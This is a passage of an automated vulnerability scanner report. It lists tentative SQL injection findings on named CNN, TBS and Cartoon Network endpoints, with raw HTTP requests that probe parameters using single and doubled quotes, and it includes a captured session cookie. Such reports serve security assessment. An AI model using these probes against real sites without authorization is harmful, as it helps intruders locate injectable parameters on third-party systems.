User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:45 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=347834&AdID=478322&TargetID=79730&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/ad.doubleclick.net/click HTTP/1.1
Host: ads.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 03:02:46 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.cnn.com:80/http:/ad.doubleclick.net/click
Expires: Sat, 11 Dec 2010 03:02:46 GMT
Connection: close
Content-Type: text/html


1.10. http://ads.tbs.com/event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.tbs.com
Path:   /event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ HTTP/1.1
Host: ads.tbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:57 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ HTTP/1.1
Host: ads.tbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 03:02:57 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.tbs.com:80/http:/www.cartoonnetwork.com/games/index.html/
Expires: Sat, 11 Dec 2010 03:02:57 GMT
Connection: close
Content-Type: text/html


1.11. http://ads.tbs.com/event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.tbs.com
Path:   /event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ HTTP/1.1
Host: ads.tbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 03:02:59 GMT
Server: Apache
Content-Length: 598
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ HTTP/1.1
Host: ads.tbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 03:02:59 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://ads.tbs.com:80/http:/www.cartoonnetwork.com/video/index.html/
Expires: Sat, 11 Dec 2010 03:02:59 GMT
Connection: close
Content-Type: text/html


1.12. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getAllEpisodes [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getAllEpisodes

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getAllEpisodes?networkName=HOME' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getAllEpisodes?networkName=HOME'' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.13. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [filterByCollectionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getEpisodesByCategory

Issue detail

The filterByCollectionId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the filterByCollectionId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getEpisodesByCategory?id=multiCat&networkName=HOME&filterByCollectionId=' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:04:04 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getEpisodesByCategory?id=multiCat&networkName=HOME&filterByCollectionId='' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:04:04 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 514

<?xml version="1.0" encoding="UTF-8"?>


       <episodes>
       <recentlyAdded recentlyAddedName="Recently Added" totalItems="0">
       
       </recentlyAdded>
       <episodesBySeasons episodesBySeasonsNam
...[SNIP]...

1.14. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getEpisodesByCategory

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getEpisodesByCategory?id=multiCat'&networkName=HOME&filterByCollectionId= HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:55 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getEpisodesByCategory?id=multiCat''&networkName=HOME&filterByCollectionId= HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:55 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.15. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getEpisodesByCategory

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getEpisodesByCategory?networkName=HOME' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:54 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getEpisodesByCategory?networkName=HOME'' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:54 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.16. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByShow [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getEpisodesByShow

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getEpisodesByShow?networkName=HOME' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:52 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getEpisodesByShow?networkName=HOME'' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:52 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.17. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getFeaturedEpisode [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getFeaturedEpisode

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getFeaturedEpisode?networkName=HOME' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:48 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getFeaturedEpisode?networkName=HOME'' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:49 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.18. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getMoreEpisodesLike [filterByCollectionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getMoreEpisodesLike

Issue detail

The filterByCollectionId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the filterByCollectionId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getMoreEpisodesLike?networkName=HOME&limit=50&howMany=6&filterByCollectionId=' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:04:06 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getMoreEpisodesLike?networkName=HOME&limit=50&howMany=6&filterByCollectionId='' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:04:06 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.19. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getMoreEpisodesLike [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getMoreEpisodesLike

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getMoreEpisodesLike?networkName=HOME'&limit=50&howMany=6&filterByCollectionId= HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:55 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getMoreEpisodesLike?networkName=HOME''&limit=50&howMany=6&filterByCollectionId= HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:55 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.20. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByCategory [filterByCollectionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cartoonnetwork.com
Path:   /cnvideosvc2/svc/episodeSearch/getEpisodesByCategory

Issue detail

The filterByCollectionId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the filterByCollectionId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cnvideosvc2/svc/episodeSearch/getEpisodesByCategory?networkName=HOME&id=multiCat&filterByCollectionId=8a250ab0230ec20c012319d48f9c015b'&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; JSESSIONID=3BF5B03317AA5DBF8F9BDD132799862C

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 02:46:01 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 8547

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /cnvideosvc2/svc/episodeSearch/getEpisodesByCategory?networkName=HOME&id=multiCat&filterByCollectionId=8a250ab0230ec20c012319d48f9c015b''&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; JSESSIONID=3BF5B03317AA5DBF8F9BDD132799862C

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:46:01 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en-US
Vary: User-Agent,Accept-Encoding
Content-Length: 514

<?xml version="1.0" encoding="UTF-8"?>


       <episodes>
       <recentlyAdded recentlyAddedName="Recently Added" totalItems="0">
       
       </recentlyAdded>
       <episodesBySeasons episodesBySeasonsNam
...[SNIP]...

1.21. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByCategory [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cartoonnetwork.com
Path:   /cnvideosvc2/svc/episodeSearch/getEpisodesByCategory

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cnvideosvc2/svc/episodeSearch/getEpisodesByCategory?networkName=HOME&id=multiCat'&filterByCollectionId=8a250ab0230ec20c012319d48f9c015b&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; JSESSIONID=3BF5B03317AA5DBF8F9BDD132799862C

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 02:45:58 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 8547

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /cnvideosvc2/svc/episodeSearch/getEpisodesByCategory?networkName=HOME&id=multiCat''&filterByCollectionId=8a250ab0230ec20c012319d48f9c015b&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; JSESSIONID=3BF5B03317AA5DBF8F9BDD132799862C

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:58 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en-US
Vary: User-Agent,Accept-Encoding
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.22. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByCategory [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cartoonnetwork.com
Path:   /cnvideosvc2/svc/episodeSearch/getEpisodesByCategory

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cnvideosvc2/svc/episodeSearch/getEpisodesByCategory?networkName=HOME'&id=multiCat&filterByCollectionId=8a250ab0230ec20c012319d48f9c015b&limit=500&offset=0&r=1269704204105 HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
